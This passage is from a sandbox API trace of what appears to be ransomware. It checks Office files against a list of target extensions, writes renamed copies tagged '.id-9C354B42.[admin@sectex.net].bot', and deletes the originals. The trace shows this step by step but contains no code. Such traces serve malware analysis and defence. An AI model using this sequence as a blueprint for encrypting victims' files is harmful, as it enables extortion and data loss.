	[0148.257] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1
	[0148.257] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXT") returned 65
	[0148.257] lstrlenW (lpString=".zip") returned 4
	[0148.257] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1
	[0148.257] lstrlenW (lpString=".rar") returned 4
	[0148.257] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1
	[0148.257] lstrlenW (lpString=".bz2") returned 4
	[0148.257] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1
	[0148.257] lstrlenW (lpString=".7z") returned 3
	[0148.257] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1
	[0148.257] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXT") returned 65
	[0148.257] lstrlenW (lpString=".dbf") returned 4
	[0148.257] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1
	[0148.257] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXT") returned 65
	[0148.257] lstrlenW (lpString=".1cd") returned 4
	[0148.257] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1
	[0148.257] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXT") returned 65
	[0148.257] lstrlenW (lpString=".jpg") returned 4
	[0148.257] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1
	[0148.258] lstrcmpiW (lpString1=".HXK", lpString2=".bot") returned 1
	[0148.258] lstrlenW (lpString="MSPUB_K_COL.HXK") returned 15
	[0148.258] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub_k_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0148.258] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=113) returned 1
	[0148.258] CloseHandle (hObject=0x384) returned 1
	[0148.258] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub_k_col.hxk")) returned 0x20
	[0148.258] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub_k_col.hxk.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.259] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0148.259] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.259] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.259] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub_k_col.hxk.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0148.260] GetLastError () returned 0x0
	[0148.260] ReadFile (in: hFile=0x384, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x71, lpOverlapped=0x0) returned 1
	[0148.260] WriteFile (in: hFile=0x3b4, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x80, lpOverlapped=0x0) returned 1
	[0148.261] ReadFile (in: hFile=0x384, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0148.261] WriteFile (in: hFile=0x3b4, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xf2, lpOverlapped=0x0) returned 1
	[0148.261] SetEndOfFile (hFile=0x3b4) returned 1
	[0148.261] CloseHandle (hObject=0x3b4) returned 1
	[0148.262] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.262] SetEndOfFile (hFile=0x384) returned 1
	[0148.264] CloseHandle (hObject=0x384) returned 1
	[0148.264] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0148.264] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub_k_col.hxk")) returned 1
	[0148.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_K_COL.HXK") returned 63
	[0148.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_K_COL.HXK") returned 63
	[0148.266] lstrlenW (lpString=".doc") returned 4
	[0148.266] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0148.266] lstrlenW (lpString=".docx") returned 5
	[0148.266] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0148.266] lstrlenW (lpString=".pdf") returned 4
	[0148.266] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0148.266] lstrlenW (lpString=".xls") returned 4
	[0148.266] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0148.266] lstrlenW (lpString=".xlsx") returned 5
	[0148.266] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0148.266] lstrlenW (lpString=".ppt") returned 4
	[0148.266] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0148.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_K_COL.HXK") returned 63
	[0148.266] lstrlenW (lpString=".zip") returned 4
	[0148.266] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0148.267] lstrlenW (lpString=".rar") returned 4
	[0148.267] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0148.267] lstrlenW (lpString=".bz2") returned 4
	[0148.267] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0148.267] lstrlenW (lpString=".7z") returned 3
	[0148.267] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0148.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_K_COL.HXK") returned 63
	[0148.267] lstrlenW (lpString=".dbf") returned 4
	[0148.267] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0148.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_K_COL.HXK") returned 63
	[0148.267] lstrlenW (lpString=".1cd") returned 4
	[0148.267] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0148.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_K_COL.HXK") returned 63
	[0148.267] lstrlenW (lpString=".jpg") returned 4
	[0148.267] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0148.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_K_COL.HXK") returned 63
	[0148.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_K_COL.HXK") returned 63
	[0148.267] lstrlenW (lpString=".doc") returned 4
	[0148.267] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0148.267] lstrlenW (lpString=".docx") returned 5
	[0148.267] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0148.267] lstrlenW (lpString=".pdf") returned 4
	[0148.267] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0148.267] lstrlenW (lpString=".xls") returned 4
	[0148.267] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0148.267] lstrlenW (lpString=".xlsx") returned 5
	[0148.267] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0148.267] lstrlenW (lpString=".ppt") returned 4
	[0148.267] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0148.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_K_COL.HXK") returned 63
	[0148.267] lstrlenW (lpString=".zip") returned 4
	[0148.268] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0148.268] lstrlenW (lpString=".rar") returned 4
	[0148.268] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0148.268] lstrlenW (lpString=".bz2") returned 4
	[0148.268] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0148.268] lstrlenW (lpString=".7z") returned 3
	[0148.268] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0148.268] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_K_COL.HXK") returned 63
	[0148.268] lstrlenW (lpString=".dbf") returned 4
	[0148.268] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0148.268] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_K_COL.HXK") returned 63
	[0148.268] lstrlenW (lpString=".1cd") returned 4
	[0148.268] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0148.268] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_K_COL.HXK") returned 63
	[0148.268] lstrlenW (lpString=".jpg") returned 4
	[0148.268] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0148.268] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0148.268] lstrlenW (lpString="MSTINTL.DLL") returned 11
	[0148.268] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mstintl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0148.288] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=89432) returned 1
	[0148.288] CloseHandle (hObject=0x3c0) returned 1
	[0148.288] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mstintl.dll")) returned 0x20
	[0148.317] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTINTL.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mstintl.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.412] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mstintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0148.420] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTINTL.DLL") returned 59
	[0148.420] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTINTL.DLL") returned 59
	[0148.420] lstrlenW (lpString=".doc") returned 4
	[0148.420] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0148.420] lstrlenW (lpString=".docx") returned 5
	[0148.420] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1
	[0148.420] lstrlenW (lpString=".pdf") returned 4
	[0148.421] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0148.421] lstrlenW (lpString=".xls") returned 4
	[0148.421] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0148.421] lstrlenW (lpString=".xlsx") returned 5
	[0148.421] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1
	[0148.421] lstrlenW (lpString=".ppt") returned 4
	[0148.421] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0148.421] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTINTL.DLL") returned 59
	[0148.421] lstrlenW (lpString=".zip") returned 4
	[0148.421] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0148.421] lstrlenW (lpString=".rar") returned 4
	[0148.421] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0148.421] lstrlenW (lpString=".bz2") returned 4
	[0148.421] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0148.421] lstrlenW (lpString=".7z") returned 3
	[0148.421] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0148.421] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTINTL.DLL") returned 59
	[0148.421] lstrlenW (lpString=".dbf") returned 4
	[0148.421] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0148.421] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTINTL.DLL") returned 59
	[0148.421] lstrlenW (lpString=".1cd") returned 4
	[0148.421] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0148.421] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTINTL.DLL") returned 59
	[0148.421] lstrlenW (lpString=".jpg") returned 4
	[0148.421] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0148.421] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTINTL.DLL") returned 59
	[0148.421] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTINTL.DLL") returned 59
	[0148.421] lstrlenW (lpString=".doc") returned 4
	[0148.421] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0148.422] lstrlenW (lpString=".docx") returned 5
	[0148.422] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1
	[0148.422] lstrlenW (lpString=".pdf") returned 4
	[0148.422] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0148.422] lstrlenW (lpString=".xls") returned 4
	[0148.422] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0148.422] lstrlenW (lpString=".xlsx") returned 5
	[0148.422] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1
	[0148.422] lstrlenW (lpString=".ppt") returned 4
	[0148.422] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0148.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTINTL.DLL") returned 59
	[0148.422] lstrlenW (lpString=".zip") returned 4
	[0148.422] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0148.422] lstrlenW (lpString=".rar") returned 4
	[0148.422] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0148.422] lstrlenW (lpString=".bz2") returned 4
	[0148.422] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0148.422] lstrlenW (lpString=".7z") returned 3
	[0148.422] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0148.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTINTL.DLL") returned 59
	[0148.422] lstrlenW (lpString=".dbf") returned 4
	[0148.422] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0148.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTINTL.DLL") returned 59
	[0148.422] lstrlenW (lpString=".1cd") returned 4
	[0148.422] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0148.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTINTL.DLL") returned 59
	[0148.422] lstrlenW (lpString=".jpg") returned 4
	[0148.422] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0148.422] lstrcmpiW (lpString1=".HXK", lpString2=".bot") returned 1
	[0148.423] lstrlenW (lpString="MSTORE_F_COL.HXK") returned 16
	[0148.423] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mstore_f_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0148.423] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=114) returned 1
	[0148.423] CloseHandle (hObject=0x31c) returned 1
	[0148.423] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mstore_f_col.hxk")) returned 0x20
	[0148.423] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mstore_f_col.hxk.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.423] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mstore_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0148.424] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.424] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.424] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mstore_f_col.hxk.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0148.424] GetLastError () returned 0x0
	[0148.424] ReadFile (in: hFile=0x31c, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x72, lpOverlapped=0x0) returned 1
	[0148.425] WriteFile (in: hFile=0x3d0, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x80, lpOverlapped=0x0) returned 1
	[0148.428] ReadFile (in: hFile=0x31c, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0148.428] WriteFile (in: hFile=0x3d0, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xf4, lpOverlapped=0x0) returned 1
	[0148.428] SetEndOfFile (hFile=0x3d0) returned 1
	[0148.428] CloseHandle (hObject=0x3d0) returned 1
	[0148.428] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.428] SetEndOfFile (hFile=0x31c) returned 1
	[0148.430] CloseHandle (hObject=0x31c) returned 1
	[0148.430] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0148.431] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mstore_f_col.hxk")) returned 1
	[0148.431] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_F_COL.HXK") returned 64
	[0148.431] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_F_COL.HXK") returned 64
	[0148.431] lstrlenW (lpString=".doc") returned 4
	[0148.431] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0148.431] lstrlenW (lpString=".docx") returned 5
	[0148.431] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0148.431] lstrlenW (lpString=".pdf") returned 4
	[0148.431] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0148.431] lstrlenW (lpString=".xls") returned 4
	[0148.431] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0148.431] lstrlenW (lpString=".xlsx") returned 5
	[0148.431] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0148.431] lstrlenW (lpString=".ppt") returned 4
	[0148.431] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0148.431] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_F_COL.HXK") returned 64
	[0148.431] lstrlenW (lpString=".zip") returned 4
	[0148.432] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0148.432] lstrlenW (lpString=".rar") returned 4
	[0148.432] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0148.432] lstrlenW (lpString=".bz2") returned 4
	[0148.432] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0148.432] lstrlenW (lpString=".7z") returned 3
	[0148.432] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0148.432] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_F_COL.HXK") returned 64
	[0148.432] lstrlenW (lpString=".dbf") returned 4
	[0148.432] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0148.432] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_F_COL.HXK") returned 64
	[0148.432] lstrlenW (lpString=".1cd") returned 4
	[0148.432] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0148.432] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_F_COL.HXK") returned 64
	[0148.432] lstrlenW (lpString=".jpg") returned 4
	[0148.432] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0148.432] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_F_COL.HXK") returned 64
	[0148.432] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_F_COL.HXK") returned 64
	[0148.432] lstrlenW (lpString=".doc") returned 4
	[0148.432] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0148.432] lstrlenW (lpString=".docx") returned 5
	[0148.432] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0148.432] lstrlenW (lpString=".pdf") returned 4
	[0148.432] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0148.432] lstrlenW (lpString=".xls") returned 4
	[0148.432] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0148.432] lstrlenW (lpString=".xlsx") returned 5
	[0148.432] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0148.432] lstrlenW (lpString=".ppt") returned 4
	[0148.432] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0148.432] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_F_COL.HXK") returned 64
	[0148.432] lstrlenW (lpString=".zip") returned 4
	[0148.433] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0148.433] lstrlenW (lpString=".rar") returned 4
	[0148.433] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0148.433] lstrlenW (lpString=".bz2") returned 4
	[0148.433] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0148.433] lstrlenW (lpString=".7z") returned 3
	[0148.433] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0148.433] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_F_COL.HXK") returned 64
	[0148.433] lstrlenW (lpString=".dbf") returned 4
	[0148.433] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0148.433] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_F_COL.HXK") returned 64
	[0148.433] lstrlenW (lpString=".1cd") returned 4
	[0148.433] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0148.433] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_F_COL.HXK") returned 64
	[0148.433] lstrlenW (lpString=".jpg") returned 4
	[0148.433] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0148.433] lstrcmpiW (lpString1=".HXK", lpString2=".bot") returned 1
	[0148.433] lstrlenW (lpString="MSTORE_K_COL.HXK") returned 16
	[0148.433] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mstore_k_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0148.434] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=113) returned 1
	[0148.434] CloseHandle (hObject=0x31c) returned 1
	[0148.434] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mstore_k_col.hxk")) returned 0x20
	[0148.434] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mstore_k_col.hxk.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.434] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mstore_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0148.434] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.434] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
